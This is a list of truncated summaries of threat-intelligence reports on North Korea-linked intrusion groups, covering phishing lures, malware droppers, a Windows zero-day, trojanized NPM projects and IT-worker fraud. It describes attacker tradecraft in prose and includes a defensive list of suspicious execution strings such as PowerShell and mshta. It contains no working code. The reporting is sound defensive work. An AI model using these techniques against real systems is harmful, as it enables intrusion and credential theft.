654 reports
NSHC's May 2024 threat actor intelligence report summarizes activity collected by the ThreatRecon team across several tracked intrusion clusters. The report states that SectorA groups were observed in many countries and describes job-recruitment social en…
NSHC's April 2024 threat actor intelligence report summarizes observed activity from multiple tracked intrusion clusters during the March to April reporting window. The report notes that SectorA groups were active alongside other regional clusters, with t…
QiAnXin Threat Intelligence Center's 2024 midyear threat report excerpt covers APT activity, ransomware, cybercrime, and zero-day exploitation trends. The excerpt says APT attacks in the first half of 2024 mainly targeted information technology, governmen…
A Kimsuky-attributed analysis describes a malicious Microsoft Management Console file named Skibidi Boilet Master.msc that masquerades as a legitimate Windows management artifact. The source provides hashes for the sample and shows embedded MMC visual att…
Gen Threat Labs reported that Lazarus exploited CVE-2024-38193, a Windows AFD.sys zero-day later patched by Microsoft, to reach sensitive system areas. The source says Gen researchers found the exploitation in early June and observed the Fudmodule malware…
Kandji analyzed TodoSwift, a signed macOS Swift/SwiftUI dropper uploaded to VirusTotal on 2024-07-24 and assessed as likely related to DPRK-linked BlueNoroff activity because of overlap with KandyKorn and RustBucket tradecraft. The TodoTasks application p…
Chainalysis reported that stolen cryptocurrency funds and ransomware inflows rose in 2024 even as aggregate illicit on-chain activity declined year to date. In the DPRK-relevant section, the report says attackers, including North Korea-linked IT workers, …
The thread describes a crypto team losing $1.3 million from its treasury after malicious code was pushed by developers later assessed to be DPRK IT workers using fake identities. The investigator mapped related developer payment addresses across more than…
Hauri's advisory provides defensive checks for suspected exploitation or misuse of vaccine management servers. It instructs administrators to query management-server logs for suspicious program execution strings such as PowerShell, cmd, mshta, winhost, ta…
The analysis examines a 2019 Kimsuky sample disguised as a Korean-language HWP quotation document with a double extension ending in .exe. The loader drops a decoy HWP file and a DLL named NewAct.dat, then uses regsvr32 to register the DLL. The DLL checks …
Cinder reported repeated attempts by suspected North Korean IT workers to obtain remote software engineering roles at the company under false or fabricated identities. The applicants often used newly created professional profiles, AI-edited or obscured pr…
Group-IB observed a Windows BeaverTail variant attributed to Lazarus alongside JavaScript BeaverTail distribution through trojanized ReactJS games packaged as NPM-based projects. The Windows sample masqueraded as a conferencing application named FCCCall.e…
A Kimsuky-attributed CHM lure masqueraded as a South Korean National Assembly committee meeting schedule, suggesting targeting of lawmakers, legislative aides, or related personnel. The sample displayed garbled visible content while embedded HTML and CHM …
Famous Chollima is a North Korea-linked, state-sponsored adversary active since at least 2018 and formerly tracked by CrowdStrike as the BadClone activity cluster. CrowdStrike characterizes the group’s main objective as financial gain through illicit free…
A Kimsuky-attributed phishing analysis examines files for a spoofed Yonsei University webmail page. The source identifies suspected phishing domains and shows PHP logic designed to capture submitted usernames, passwords, request URLs, and client address d…